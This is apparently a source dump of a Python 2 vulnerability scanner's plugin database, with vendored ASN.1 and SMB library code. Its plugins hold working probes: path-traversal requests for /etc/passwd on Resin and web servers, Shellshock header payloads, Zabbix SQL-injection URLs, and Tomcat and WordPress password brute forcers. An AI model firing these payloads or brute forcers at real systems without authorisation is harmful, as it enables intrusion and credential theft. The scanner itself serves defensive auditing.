class GeneralString(univ.OctetString):
    tagSet = univ.OctetString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 27)
    )

class UniversalString(univ.OctetString):
    tagSet = univ.OctetString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 28)
    )
    encoding = "utf-32-be"

class BMPString(univ.OctetString):
    tagSet = univ.OctetString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 30)
    )
    encoding = "utf-16-be"

class UTF8String(univ.OctetString):
    tagSet = univ.OctetString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 12)
    )
    encoding = "utf-8"

# ==== /server/vulscan/vuldb/pyasn1/type/error.py ====
from pyasn1.error import PyAsn1Error

class ValueConstraintError(PyAsn1Error): pass

# ==== /server/vulscan/vuldb/pyasn1/type/namedval.py ====
# ASN.1 named integers
from pyasn1 import error

__all__ = [ 'NamedValues' ]

class NamedValues:
    """
    Ordered, bidirectional name<->value mapping for named integers/bits.

    Arguments are either ``(name, value)`` tuples or bare names; a bare name
    gets an automatic value.  The automatic counter starts at 1 and advances
    once per argument, including explicit tuples.  Duplicate names or values
    raise ``PyAsn1Error``.
    """
    def __init__(self, *namedValues):
        self.nameToValIdx = {}; self.valToNameIdx = {}
        self.namedValues = ()
        automaticVal = 1
        for namedValue in namedValues:
            if isinstance(namedValue, tuple):
                name, val = namedValue
            else:
                name = namedValue
                val = automaticVal
            if name in self.nameToValIdx:
                raise error.PyAsn1Error('Duplicate name %s' % (name,))
            self.nameToValIdx[name] = val
            if val in self.valToNameIdx:
                raise error.PyAsn1Error('Duplicate value %s=%s' % (name, val))
            self.valToNameIdx[val] = name
            self.namedValues = self.namedValues + ((name, val),)
            automaticVal = automaticVal + 1

    def __repr__(self):
        return '%s(%s)' % (self.__class__.__name__, ', '.join([repr(x) for x in self.namedValues]))

    def __str__(self): return str(self.namedValues)

    # Comparison and hashing are by the ordered (name, value) tuple sequence.
    def __eq__(self, other): return tuple(self) == tuple(other)
    def __ne__(self, other): return tuple(self) != tuple(other)
    def __lt__(self, other): return tuple(self) < tuple(other)
    def __le__(self, other): return tuple(self) <= tuple(other)
    def __gt__(self, other): return tuple(self) > tuple(other)
    def __ge__(self, other): return tuple(self) >= tuple(other)
    def __hash__(self): return hash(tuple(self))

    def getName(self, value):
        # Returns None for an unknown value.
        if value in self.valToNameIdx:
            return self.valToNameIdx[value]

    def getValue(self, name):
        # Returns None for an unknown name.
        if name in self.nameToValIdx:
            return self.nameToValIdx[name]

    def __getitem__(self, i): return self.namedValues[i]
    def __len__(self): return len(self.namedValues)

    def __add__(self, namedValues):
        return self.__class__(*self.namedValues + namedValues)
    def __radd__(self, namedValues):
        return self.__class__(*namedValues + tuple(self))

    def clone(self, *namedValues):
        return self.__class__(*tuple(self) + namedValues)

    # XXX clone/subtype?
# ==== /server/vulscan/vuldb/pyasn1/type/tagmap.py ====
from pyasn1 import error

class TagMap:
    """
    Lookup from tag set to ASN.1 type used by the codecs.

    ``posMap`` holds explicit tag -> type entries, ``negMap`` tags that must
    NOT fall through to the default, and ``defType`` an optional catch-all
    type returned for any tag not in either map.  The mutable-default
    arguments are copied immediately, so instances do not share state.
    """
    def __init__(self, posMap={}, negMap={}, defType=None):
        self.__posMap = posMap.copy()
        self.__negMap = negMap.copy()
        self.__defType = defType

    def __contains__(self, tagSet):
        return tagSet in self.__posMap or \
               self.__defType is not None and tagSet not in self.__negMap

    def __getitem__(self, tagSet):
        # Explicit entry wins; a negative entry is an error even if a default exists.
        if tagSet in self.__posMap:
            return self.__posMap[tagSet]
        elif tagSet in self.__negMap:
            raise error.PyAsn1Error('Key in negative map')
        elif self.__defType is not None:
            return self.__defType
        else:
            raise KeyError()

    def __repr__(self):
        s = self.__class__.__name__ + '('
        if self.__posMap:
            s = s + 'posMap=%r, ' % (self.__posMap,)
        if self.__negMap:
            s = s + 'negMap=%r, ' % (self.__negMap,)
        if self.__defType is not None:
            s = s + 'defType=%r' % (self.__defType,)
        return s + ')'

    def __str__(self):
        s = self.__class__.__name__ + ':\n'
        if self.__posMap:
            s = s + 'posMap:\n%s, ' % ',\n '.join([ x.prettyPrintType() for x in self.__posMap.values()])
        if self.__negMap:
            s = s + 'negMap:\n%s, ' % ',\n '.join([ x.prettyPrintType() for x in self.__negMap.values()])
        if self.__defType is not None:
            s = s + 'defType:\n%s, ' % self.__defType.prettyPrintType()
        return s

    def clone(self, parentType, tagMap, uniq=False):
        """
        Merge ``tagMap`` into a copy of this map, mapping every positive key of
        ``tagMap`` to ``parentType``.  Two defaults, or (with ``uniq``) a
        positive key already present, raise ``PyAsn1Error``.
        """
        if self.__defType is not None and tagMap.getDef() is not None:
            raise error.PyAsn1Error('Duplicate default value at %s' % (self,))
        if tagMap.getDef() is not None:
            defType = tagMap.getDef()
        else:
            defType = self.__defType

        posMap = self.__posMap.copy()
        for k in tagMap.getPosMap():
            if uniq and k in posMap:
                raise error.PyAsn1Error('Duplicate positive key %s' % (k,))
            posMap[k] = parentType

        negMap = self.__negMap.copy()
        negMap.update(tagMap.getNegMap())

        return self.__class__(
            posMap, negMap, defType,
        )

    # Accessors return copies so callers cannot mutate internal state.
    def getPosMap(self): return self.__posMap.copy()
    def getNegMap(self): return self.__negMap.copy()
    def getDef(self): return self.__defType

# ==== /server/vulscan/vuldb/pyasn1/type/useful.py ====
# ASN.1 "useful" types
from pyasn1.type import char, tag

class ObjectDescriptor(char.GraphicString):
    tagSet = char.GraphicString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 7)
    )

class GeneralizedTime(char.VisibleString):
    tagSet = char.VisibleString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 24)
    )

class UTCTime(char.VisibleString):
    tagSet = char.VisibleString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 23)
    )

# ==== /server/vulscan/vuldb/resin_fileread.json ====
{
    "name" : "Resin任意文件读取_4",
    "info" : "可通过此漏洞读取服务器上的文件 examples",
    "level" : "高危",
    "type" : "文件读取",
    "author" : "wolf@YSRC",
    "url": "",
    "keyword" : "tag:resin",
    "source" : 1,
    "plugin" : {
        "url" : "/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
        "tag" : "存在任意文件读取漏洞 /resin-doc/examples/jndi-appconfig/test?inputFile=../../../../../../../etc/passwd",
        "analyzing" : "keyword",
        "analyzingdata" : "root:",
        "data" : "",
        "method" : "GET"
    }
}
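# ==== /server/vulscan/vuldb/resin_fileread_1.json ====
{
    "info" : "可通过此漏洞读取服务器上的文件 resource",
    "name" : "Resin任意文件读取_1",
    "level" : "高危",
    "type" : "文件读取",
    "author" : "wolf@YSRC",
    "url": "",
    "keyword" : "tag:resin",
    "source" : 1,
    "plugin" : {
        "url" : "/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd",
        "tag" : "存在任意文件读取漏洞 /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd",
        "analyzing" : "keyword",
        "analyzingdata" : "root:",
        "data" : "",
        "method" : "GET"
    }
}

# ==== /server/vulscan/vuldb/resin_fileread_3.json ====
{
    "name" : "Resin任意文件读取_3",
    "info" : "Resin File Read And Directory Browsing Vul CVE:2007-2440",
    "level" : "高危",
    "type" : "文件读取",
    "author" : "wolf@YSRC",
    "url": "",
    "keyword" : "tag:resin",
    "source" : 1,
    "plugin" : {
        "url" : "/%20..\\\\web-inf",
        "tag" : "存在CVE:2007-2440漏洞",
        "analyzing" : "keyword",
        "analyzingdata" : "Directory of",
        "data" : "",
        "method" : "GET"
    }
}

# ==== /server/vulscan/vuldb/smb/SMBHandler.py ====

import os, sys, socket, urllib2, mimetypes, mimetools, tempfile
from urllib import (unwrap, unquote, splittype, splithost, quote,
                    addinfourl, splitport, splittag,
                    splitattr, ftpwrapper, splituser, splitpasswd, splitvalue)
from nmb.NetBIOS import NetBIOS
from smb.SMBConnection import SMBConnection

try:
    from cStringIO import StringIO
except ImportError:
    from StringIO import StringIO

# Passed to SMBConnection as use_ntlm_v2; leave True unless a peer only speaks NTLMv1.
USE_NTLM = True
# Client machine name announced to the server; None => derived from the local hostname.
MACHINE_NAME = None

class SMBHandler(urllib2.BaseHandler):
    """
    urllib2 handler for ``smb://[domain;]user:password@host[:port]/share/path``.

    A request carrying data uploads it to ``share/path``; any other request
    downloads ``share/path`` into a temporary file.  The credentials travel in
    the URL string itself, so such URLs must be kept out of logs and error text.
    """

    def smb_open(self, req):
        """
        Open ``req`` (an ``smb://`` Request) and return an ``addinfourl``.

        Raises ``urllib2.URLError`` when the URL has no host, the host does not
        answer a NetBIOS name query, or anything fails during the SMB exchange
        (the original exception is wrapped, traceback preserved).

        NOTE(review): neither the ``NetBIOS`` object nor ``conn`` is closed here;
        whether the library releases the sockets on garbage collection is not
        visible from this file — verify before relying on it in a long-lived
        scanner process.
        """
        global USE_NTLM, MACHINE_NAME

        host = req.get_host()
        if not host:
            raise urllib2.URLError('SMB error: no host given')
        host, port = splitport(host)
        if port is None:
            port = 139
        else:
            port = int(port)

        # username/password handling: smb://[domain;]user:pass@host
        user, host = splituser(host)
        if user:
            user, passwd = splitpasswd(user)
        else:
            passwd = None
        host = unquote(host)
        user = user or ''

        domain = ''
        if ';' in user:
            domain, user = user.split(';', 1)

        passwd = passwd or ''
        myname = MACHINE_NAME or self.generateClientMachineName()

        # The server's NetBIOS name is needed for the session request.
        n = NetBIOS()
        names = n.queryIPForName(host)
        if names:
            server_name = names[0]
        else:
            raise urllib2.URLError('SMB error: Hostname does not reply back with its machine name')

        # First path component is the share ("service"), the rest is the file path.
        path, attrs = splitattr(req.get_selector())
        if path.startswith('/'):
            path = path[1:]
        dirs = [unquote(d) for d in path.split('/')]
        service, path = dirs[0], '/'.join(dirs[1:])

        try:
            conn = SMBConnection(user, passwd, myname, server_name, domain=domain, use_ntlm_v2 = USE_NTLM)
            conn.connect(host, port)

            if req.has_data():
                data_fp = req.get_data()
                filelen = conn.storeFile(service, path, data_fp)

                headers = "Content-length: 0\n"
                fp = StringIO("")
            else:
                # Whole file is fetched into the temp file before returning.
                fp = self.createTempFile()
                file_attrs, retrlen = conn.retrieveFile(service, path, fp)
                fp.seek(0)

                headers = ""
                mtype = mimetypes.guess_type(req.get_full_url())[0]
                if mtype:
                    headers += "Content-type: %s\n" % mtype
                if retrlen is not None and retrlen >= 0:
                    headers += "Content-length: %d\n" % retrlen

            sf = StringIO(headers)
            headers = mimetools.Message(sf)

            return addinfourl(fp, headers, req.get_full_url())
        except Exception as ex:
            # Wrap as URLError, keeping the original traceback (Python 2 three-argument raise).
            raise urllib2.URLError, ('smb error: %s' % ex), sys.exc_info()[2]

    def createTempFile(self):
        """Anonymous temp file that receives a downloaded file."""
        return tempfile.TemporaryFile()

    def generateClientMachineName(self):
        """Short local hostname, or ``SMB<pid>`` when no hostname is available."""
        hostname = socket.gethostname()
        if hostname:
            return hostname.split('.')[0]
        return 'SMB%d' % os.getpid()

# ==== /server/vulscan/vuldb/smb/__init__.py ====

# ==== /server/vulscan/vuldb/smb/smb2_constants.py ====
# Wire constants from [MS-SMB2]; values are fixed by the protocol, do not edit.

# Bitmask for Flags field in SMB2 message header
SMB2_FLAGS_SERVER_TO_REDIR = 0x01
SMB2_FLAGS_ASYNC_COMMAND = 0x02
SMB2_FLAGS_RELATED_OPERATIONS = 0x04
SMB2_FLAGS_SIGNED = 0x08
SMB2_FLAGS_DFS_OPERATIONS = 0x10000000

# Values for Command field in SMB2 message header
SMB2_COM_NEGOTIATE = 0x0000
SMB2_COM_SESSION_SETUP = 0x0001
SMB2_COM_LOGOFF = 0x0002
SMB2_COM_TREE_CONNECT = 0x0003
SMB2_COM_TREE_DISCONNECT = 0x0004
SMB2_COM_CREATE = 0x0005
SMB2_COM_CLOSE = 0x0006
SMB2_COM_FLUSH = 0x0007
SMB2_COM_READ = 0x0008
SMB2_COM_WRITE = 0x0009
SMB2_COM_LOCK = 0x000A
SMB2_COM_IOCTL = 0x000B
SMB2_COM_CANCEL = 0x000C
SMB2_COM_ECHO = 0x000D
SMB2_COM_QUERY_DIRECTORY = 0x000E
SMB2_COM_CHANGE_NOTIFY = 0x000F
SMB2_COM_QUERY_INFO = 0x0010
SMB2_COM_SET_INFO = 0x0011
SMB2_COM_OPLOCK_BREAK = 0x0012

# Command code -> name, for logging/debugging.
SMB2_COMMAND_NAMES = {
    0x0000: 'SMB2_COM_NEGOTIATE',
    0x0001: 'SMB2_COM_SESSION_SETUP',
    0x0002: 'SMB2_COM_LOGOFF',
    0x0003: 'SMB2_COM_TREE_CONNECT',
    0x0004: 'SMB2_COM_TREE_DISCONNECT',
    0x0005: 'SMB2_COM_CREATE',
    0x0006: 'SMB2_COM_CLOSE',
    0x0007: 'SMB2_COM_FLUSH',
    0x0008: 'SMB2_COM_READ',
    0x0009: 'SMB2_COM_WRITE',
    0x000A: 'SMB2_COM_LOCK',
    0x000B: 'SMB2_COM_IOCTL',
    0x000C: 'SMB2_COM_CANCEL',
    0x000D: 'SMB2_COM_ECHO',
    0x000E: 'SMB2_COM_QUERY_DIRECTORY',
    0x000F: 'SMB2_COM_CHANGE_NOTIFY',
    0x0010: 'SMB2_COM_QUERY_INFO',
    0x0011: 'SMB2_COM_SET_INFO',
    0x0012: 'SMB2_COM_OPLOCK_BREAK',
}

# Values for dialect_revision field in SMB2NegotiateResponse class
SMB2_DIALECT_2 = 0x0202
SMB2_DIALECT_21 = 0x0210
SMB2_DIALECT_2ALL = 0x02FF

# Bit mask for SecurityMode field in SMB2NegotiateResponse class
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002

# Values for ShareType field in SMB2TreeConnectResponse class
SMB2_SHARE_TYPE_DISK = 0x01
SMB2_SHARE_TYPE_PIPE = 0x02
SMB2_SHARE_TYPE_PRINTER = 0x03

# Bitmask for Capabilities in SMB2TreeConnectResponse class
SMB2_SHARE_CAP_DFS = 0x0008

# Values for OpLockLevel field in SMB2CreateRequest class
SMB2_OPLOCK_LEVEL_NONE = 0x00
SMB2_OPLOCK_LEVEL_II = 0x01
SMB2_OPLOCK_LEVEL_EXCLUSIVE = 0x08
SMB2_OPLOCK_LEVEL_BATCH = 0x09
SMB2_OPLOCK_LEVEL_LEASE = 0xFF

# Values for FileAttributes field in SMB2CreateRequest class
# The values are defined in [MS-FSCC] 2.6
SMB2_FILE_ATTRIBUTE_ARCHIVE = 0x0020
SMB2_FILE_ATTRIBUTE_COMPRESSED = 0x0800
SMB2_FILE_ATTRIBUTE_DIRECTORY = 0x0010
SMB2_FILE_ATTRIBUTE_ENCRYPTED = 0x4000
SMB2_FILE_ATTRIBUTE_HIDDEN = 0x0002
SMB2_FILE_ATTRIBUTE_NORMAL = 0x0080
SMB2_FILE_ATTRIBUTE_NOTINDEXED = 0x2000
SMB2_FILE_ATTRIBUTE_OFFLINE = 0x1000
SMB2_FILE_ATTRIBUTE_READONLY = 0x0001
SMB2_FILE_ATTRIBUTE_SPARSE = 0x0200
SMB2_FILE_ATTRIBUTE_SYSTEM = 0x0004
SMB2_FILE_ATTRIBUTE_TEMPORARY = 0x0100

# Values for CreateAction field in SMB2CreateResponse class
# (the spec spells it FILE_SUPERSEDED; the name below is kept for callers)
SMB2_FILE_SUPERCEDED = 0x00
SMB2_FILE_OPENED = 0x01
SMB2_FILE_CREATED = 0x02
SMB2_FILE_OVERWRITTEN = 0x03

# Values for InfoType field in SMB2QueryInfoRequest class
SMB2_INFO_FILE = 0x01
SMB2_INFO_FILESYSTEM = 0x02
SMB2_INFO_SECURITY = 0x03
SMB2_INFO_QUOTA = 0x04

# ==== /server/vulscan/vuldb/smb/utils/__init__.py ====

def convertFILETIMEtoEpoch(t):
    """
    Convert a Windows FILETIME (100-ns ticks since 1601-01-01) to seconds since
    the Unix epoch as a float.

    The epoch offset is a plain int literal: the old ``L`` suffix was a
    SyntaxError on Python 3 and unnecessary on Python 2, which promotes to
    long automatically.
    """
    return (t - 116444736000000000) / 10000000.0

# ==== /server/vulscan/vuldb/svn_entries_disclosure.json ====
{
    "name": ".svn代码泄露",
    "info": "未删除.svn目录导致源代码信息泄露",
    "level": "中危",
    "type": "信息泄露",
    "author": "0xbug",
    "url": "https://www.rapid7.com/db/vulnerabilities/spider-svn-entries-disclosure",
    "keyword": "server:web",
    "source": 1,
    "plugin": {
        "url": "/.svn/all-wcprops",
        "tag": "存在/.svn/目录",
        "analyzing": "keyword",
        "analyzingdata": "svn:wc:ra_dav:version-url",
        "data": "",
        "method": "GET"
    }
}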
-------------------------------------------------------------------------------- /server/vulscan/vuldb/tomcat_crackpass.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | # author:wolf 3 | import urllib2 4 | import base64 5 | 6 | 7 | def get_plugin_info(): 8 | plugin_info = { 9 | "name": "Tomcat弱口令", 10 | "info": "攻击者通过此漏洞可以登陆管理控制台,通过部署功能可直接获取服务器权限。", 11 | "level": "高危", 12 | "type": "弱口令", 13 | "author": "wolf@YSRC", 14 | "url": "http://huaidan.org/archives/1207.html", 15 | "keyword": "tag:tomcat", 16 | "source": 1 17 | } 18 | return plugin_info 19 | 20 | 21 | def check(ip, port, timeout): 22 | error_i = 0 23 | flag_list = ['/manager/html/reload', 'Tomcat Web Application Manager'] 24 | user_list = ['admin', 'manager', 'tomcat', 'apache', 'root'] 25 | for user in user_list: 26 | for pass_ in PASSWORD_DIC: 27 | try: 28 | pass_ = str(pass_.replace('{user}', user)) 29 | login_url = 'http://' + ip + ":" + str(port) + '/manager/html' 30 | request = urllib2.Request(login_url) 31 | auth_str_temp = user + ':' + pass_ 32 | auth_str = base64.b64encode(auth_str_temp) 33 | request.add_header('Authorization', 'Basic ' + auth_str) 34 | res = urllib2.urlopen(request, timeout=timeout) 35 | res_code = res.code 36 | res_html = res.read() 37 | except urllib2.HTTPError, e: 38 | res_code = e.code 39 | res_html = e.read() 40 | except urllib2.URLError, e: 41 | error_i += 1 42 | if error_i >= 3: return 43 | continue 44 | if int(res_code) == 404: return 45 | if int(res_code) == 401 or int(res_code) == 403: continue 46 | for flag in flag_list: 47 | if flag in res_html: 48 | return u'Tomcat弱口令 %s:%s' % (user, pass_) 49 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/web_fileread.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import re 3 | import socket 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": 
"WebServer任意文件读取", 9 | "info": "web容器对请求处理不当,可能导致可以任意文件读取(例:GET ../../../../../etc/passwd)。", 10 | "level": "高危", 11 | "type": "任意文件读取", 12 | "author": "wolf@YSRC", 13 | "url": "https://www.secpulse.com/archives/4276.html", 14 | "keyword": "server:web", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | 20 | def check(ip, port, timeout): 21 | try: 22 | socket.setdefaulttimeout(timeout) 23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 | s.connect((ip, int(port))) 25 | flag = "GET /../../../../../../../../../etc/passwd HTTP/1.1\r\n\r\n" 26 | s.send(flag) 27 | data = s.recv(1024) 28 | s.close() 29 | if 'root:' in data and 'nobody:' in data: 30 | return u"web容器任意文件读取漏洞" 31 | except: 32 | pass 33 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/web_shellshock.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import urllib2 3 | import re 4 | import urlparse 5 | import HTMLParser 6 | 7 | 8 | def get_plugin_info(): 9 | plugin_info = { 10 | "name": "shellshock破壳", 11 | "info": "攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,最终完全控制目标系统", 12 | "level": "紧急", 13 | "type": "命令执行", 14 | "author": "wolf@YSRC", 15 | "url": "http://www.freebuf.com/articles/system/45390.html", 16 | "keyword": "server:web", 17 | "source": 1 18 | } 19 | return plugin_info 20 | 21 | 22 | def get_url(domain, timeout): 23 | url_list = [] 24 | res = urllib2.urlopen('http://' + domain, timeout=timeout) 25 | html = res.read() 26 | root_url = res.geturl() 27 | m = re.findall("]*?href=('|\")(.*?)\\1", html, re.I) 28 | if m: 29 | for url in m: 30 | ParseResult = urlparse.urlparse(url[1]) 31 | if ParseResult.netloc and ParseResult.scheme: 32 | if domain == ParseResult.hostname: 33 | url_list.append(HTMLParser.HTMLParser().unescape(url[1])) 34 | elif not ParseResult.netloc and not ParseResult.scheme: 35 | url_list.append(HTMLParser.HTMLParser().unescape(urlparse.urljoin(root_url, url[1]))) 36 | 
return list(set(url_list)) 37 | 38 | 39 | def check(ip, port, timeout): 40 | try: 41 | url_list = get_url(ip + ":" + str(port), timeout) 42 | except Exception, e: 43 | return 44 | try: 45 | flag_list = ['() { :; }; /bin/expr 32001611 - 100', '{() { _; } >_[$($())] { /bin/expr 32001611 - 100; }}'] 46 | i = 0 47 | for url in url_list: 48 | if '.cgi' in url: 49 | i += 1 50 | if i >= 4: return 51 | for flag in flag_list: 52 | header = {'cookie': flag, 'User-Agent': flag, 'Referrer': flag} 53 | try: 54 | request = urllib2.Request('http://' + url, headers=header) 55 | res_html = urllib2.urlopen(request).read() 56 | except urllib2.HTTPError, e: 57 | res_html = e.read() 58 | if "32001511" in res_html: 59 | return u'shellshock命令执行漏洞' 60 | except Exception, e: 61 | pass 62 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/wordpress_crackpass.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import urllib2 3 | import re 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "Wordpress弱口令", 9 | "info": "攻击者通过此漏洞进入后台,通过编辑功能可获取webshell,最终导致服务器被入侵控制。", 10 | "level": "高危", 11 | "type": "弱口令", 12 | "author": "wolf@YSRC", 13 | "url": "", 14 | "keyword": "tag:wordpress", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | 20 | def get_user(url, timeout): 21 | user_list = [] 22 | for i in range(1, 8): 23 | try: 24 | getuser_url = 'http://' + url + "/?author=" + str(i) 25 | res = urllib2.urlopen(getuser_url, timeout=timeout) 26 | res_html = res.read() 27 | pattern = "/author\/(.*)\/feed" 28 | p = "(.*?)(\||-)" 29 | m = re.search(pattern, res_html) 30 | if m: 31 | user_list.append(m.group(1).strip()) 32 | else: 33 | m1 = re.search(p, res_html) 34 | if m1: 35 | user_list.append(m1.group(1).strip()) 36 | except Exception, e: 37 | if len(user_list): 38 | return user_list 39 | else: 40 | return ['admin'] 41 | if len(user_list): 42 | return user_list 43 | else: 
44 | return ['admin'] 45 | 46 | 47 | def check(ip, port, timeout): 48 | url = ip + ":" + str(port) 49 | flag_list = ['<name>isAdmin</name>', '<name>url</name>'] 50 | user_list = get_user(url, timeout) 51 | error_i = 0 52 | for user_str in user_list: 53 | pass_list.append(user_str) 54 | try: 55 | if ':' in url: 56 | domain = url.split(':', 1)[0] 57 | else: 58 | domain = url 59 | domain_sp = domain.split('.') 60 | pass_list.append(domain) 61 | pass_list.append(domain_sp[0]) 62 | pass_list.append(domain_sp[len(domain_sp) - 2] + "." + domain_sp[len(domain_sp) - 1]) 63 | pass_list.append(domain_sp[len(domain_sp) - 2]) 64 | except: 65 | pass 66 | for pass_str in PASSWORD_DIC: 67 | try: 68 | login_path = '/xmlrpc.php' 69 | PostStr = "<?xml version='1.0' encoding='iso-8859-1'?><methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>%s</value></param> <param><value>%s</value></param> </params></methodCall>" % ( 70 | user_str, pass_str) 71 | request = urllib2.Request('http://' + url + login_path, PostStr) 72 | res = urllib2.urlopen(request, timeout=timeout) 73 | res_html = res.read() 74 | for flag in flag_list: 75 | if flag in res_html: 76 | return u'Wordpress后台弱口令,账号:%s 密码:%s' % (user_str, pass_str) 77 | except urllib2.URLError, e: 78 | error_i += 1 79 | if error_i >= 3: return 80 | except: 81 | return 82 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/zabbix_jsrpc_SQL.json: -------------------------------------------------------------------------------- 1 | { 2 | "info": "攻击者通过此漏洞可获取管理员权限登陆后台,后台存在执行命令功能,导致服务器被入侵控制。", 3 | "source": 1, 4 | "name": "zabbix jsrpc SQL注入", 5 | "keyword": "tag:zabbix", 6 | "level": "高危", 7 | "url": "https://github.com/Medicean/VulApps/tree/master/z/zabbix/1", 8 | "author": "wolf@YSRC", 9 | "type": "SQL注入", 10 | "plugin": { 11 | "url": 
"/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x36),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17", 12 | "tag": "POC:/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1 or updatexml(1,md5(0x36),1) or 1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17", 13 | "analyzing": "keyword", 14 | "analyzingdata": "c5a880faf6fb5e6087eb1b2dc", 15 | "data": "", 16 | "method": "GET" 17 | } 18 | } -------------------------------------------------------------------------------- /server/vulscan/vuldb/zabbix_latest_sql.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import re 3 | import urllib2 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "Zabbix latest SQL注入", 9 | "info": "攻击者通过此漏洞可获取管理员权限登陆后台,后台存在执行命令功能,导致服务器被入侵控制。", 10 | "level": "高危", 11 | "type": "SQL注入", 12 | "author": "wolf@YSRC", 13 | "url": "https://github.com/Medicean/VulApps/tree/master/z/zabbix/2", 14 | "keyword": "tag:zabbix", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | 20 | def check(ip, port, timeout): 21 | try: 22 | url = "http://" + ip + ":" + str(port) 23 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor()) 24 | request = opener.open(url + "/dashboard.php", timeout=timeout) 25 | res_html = request.read() 26 | except: 27 | return 28 | if 'href="slides.php?sid=' in res_html: 29 | m = re.search(r'href="slides\.php\?sid=(.+?)">', res_html, re.M | re.I) 30 | if m: 31 | sid = m.group(1) 32 | payload = "/latest.php?output=ajax&sid={sid}&favobj=toggle&toggle_open_state=1&toggle_ids[]=(select%20updatexml(1,concat(0x7e,(SELECT%20md5(666)),0x7e),1))".format( 33 | sid=sid) 34 | res_html = opener.open(url + payload, timeout=timeout).read() 35 | if 'fae0b27c451c728867a567e8c1bb4e5' in res_html: 36 | return 
u"存在SQL注入,POC:" + payload 37 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/zookeeper_unauth_access.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import socket 3 | 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": "Zookeeper未授权访问", 8 | "info": "Zookeeper Unauthorized access", 9 | "level": "中危", 10 | "type": "未授权访问", 11 | "author": "c4bbage@qq.com", 12 | "url": "https://hackerone.com/reports/154369", 13 | "keyword": "server:Zookeeper", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | 19 | def check(ip, port, timeout): 20 | try: 21 | socket.setdefaulttimeout(timeout) 22 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 23 | s.connect((ip, int(port))) 24 | flag = "envi" 25 | # envi 26 | # dump 27 | # reqs 28 | # ruok 29 | # stat 30 | s.send(flag) 31 | data = s.recv(1024) 32 | s.close() 33 | if 'Environment' in data: 34 | return u"Zookeeper Unauthorized access" 35 | except: 36 | pass 37 | 38 | 39 | def main(): 40 | ip = "1.1.1.1" 41 | print check(ip, 2181, 2) 42 | 43 | if __name__ == '__main__': 44 | main() 45 | -------------------------------------------------------------------------------- /webpack.config.js: -------------------------------------------------------------------------------- 1 | // Learn more on how to config. 2 | // - https://github.com/ant-tool/atool-build#配置扩展 3 | var path = require('path'); 4 | 5 | module.exports = function(webpackConfig) { 6 | webpackConfig.babel.plugins.push('transform-runtime'); 7 | webpackConfig.babel.plugins.push(['import', { 8 | libraryName: 'antd', 9 | style: 'css', 10 | }]); 11 | // webpackConfig.output.path = path.join(__dirname, '/server/templates'); 12 | return webpackConfig; 13 | }; 14 | --------------------------------------------------------------------------------

Resin home:Resin home: